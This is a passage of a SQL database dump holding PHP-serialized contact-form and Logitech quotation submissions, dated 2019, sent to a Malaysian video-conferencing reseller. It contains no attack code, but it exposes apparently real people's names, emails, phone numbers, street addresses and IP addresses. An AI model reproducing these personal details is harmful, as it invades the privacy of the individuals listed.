Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0182330200\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Leopad\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Latest teleconference device\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"19\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-07 10:30:26','175.139.228.217','1'),(264,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Suhaini Binti Syafri\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"suhaini@tarkus.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017-3769093\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Tarkus Interior Pte Ltd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:83:\"3A-21 ECO SKY, NO 972 BATU 6 1/2 JALAN IPOH, 68100 KUALA LUMPUR WILAYAH PERSEKUTUAN\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Logitech Brio, Logitech C9230e, Logitech C925e, Logitech B525\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-07 11:36:02','121.122.98.163','1'),(265,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Danny\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"danny@klsenergy.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"03 2283 3388\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"KLS Energy\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:269:\"We want to do up our meeting room to make it video conference call enable, at the moment we have a 60 inches TV in the meeting room and our office is fully WiFi. Please submit your proposal tomorrow. We plan to have our first video conference call next week. Thank you.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-07 13:52:37','202.186.169.216','1'),(266,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"rafid khudhur alsaedi\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"rafedalsaedi@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01121203500\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Basra University\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:89:\"I would like to buy a video conference camera, may i know when u can come to you comoany?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"11\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-11 17:15:56','123.136.117.33','1'),(267,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Wong Wai Kit\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"waikit@alhq.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162061844\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"AFS Engineering\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"8A, Jalan Kenari 10, Bandar Puchong Jaya\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:63:\"Hi, I would like to request quotation for Logitech Rally System\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-13 08:26:57','203.106.119.114','1'),(268,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Satishan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"satishan@transad.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60169328104\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Transad Malaysia SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"8th Flr, Menara Manulife,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-13 12:43:58','121.122.46.221','1'),(269,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Satishan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"satishan@transad.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60169328104\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Transad Malaysia SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"8th Flr, Menara Manulife,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-13 12:44:11','121.122.46.221','1'),(270,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Mong Xeng Khan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"xengkhan.mong@ytlcomms.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0173900580\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"YTL Communications\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Zoom plans and Cameras\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-13 16:36:43','202.186.249.125','1'),(271,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Wendy Chong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"wendychong@vvmanagement.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number 